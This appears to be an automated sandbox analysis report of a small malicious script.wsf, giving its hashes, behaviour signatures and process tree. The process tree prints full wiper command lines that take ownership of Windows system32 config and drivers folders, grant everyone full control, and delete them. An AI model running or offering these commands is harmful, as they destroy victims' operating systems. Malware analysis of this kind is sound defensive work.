Analysis

  • max time kernel: 11s
  • max time network: 16s
  • platform: windows7_x64
  • resource: win7-20240704-en
  • resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted: 15-08-2024 21:44

General

  • Target: script.wsf
  • Size: 3KB
  • MD5: 0355b976d816c3dafeda740c75450a08
  • SHA1: 98de5b1ee4c653658966effecf248bf7a8df7cd1
  • SHA256: 7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
  • SHA512: 2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt (4 IoCs)
  • Modifies file permissions (1 TTPs, 4 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (21 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2596
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3064
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2068
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1464

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs
    Filesize: 3KB
    MD5: 0355b976d816c3dafeda740c75450a08
    SHA1: 98de5b1ee4c653658966effecf248bf7a8df7cd1
    SHA256: 7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
    SHA512: 2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

  • C:\Users\Admin\Desktop\desktop.vbs
    Filesize: 79B
    MD5: edc6cfebfd829729d9fc80aaaf02d193
    SHA1: 6d04bf8c7b542301f7eb77eeceed16969053537c
    SHA256: d0391b24b4bb809ba05a9b9e3fbee72a8b39381b16567de0ca7d9f403211cb47
    SHA512: 8afab19929d1bc3fe4d878ee7dd0b711834e53564afdf8e7d0a7186d1f01b35f5f4aeba4d3c5c964e2fbda08203611dc8bd140b717d3e579dc4b3f1684e3908c

  • C:\Users\Admin\Downloads\ReadAdd.mp3
    Filesize: 2B
    MD5: 81051bcc2cf1bedf378224b0a93e2877
    SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
    SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
    SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d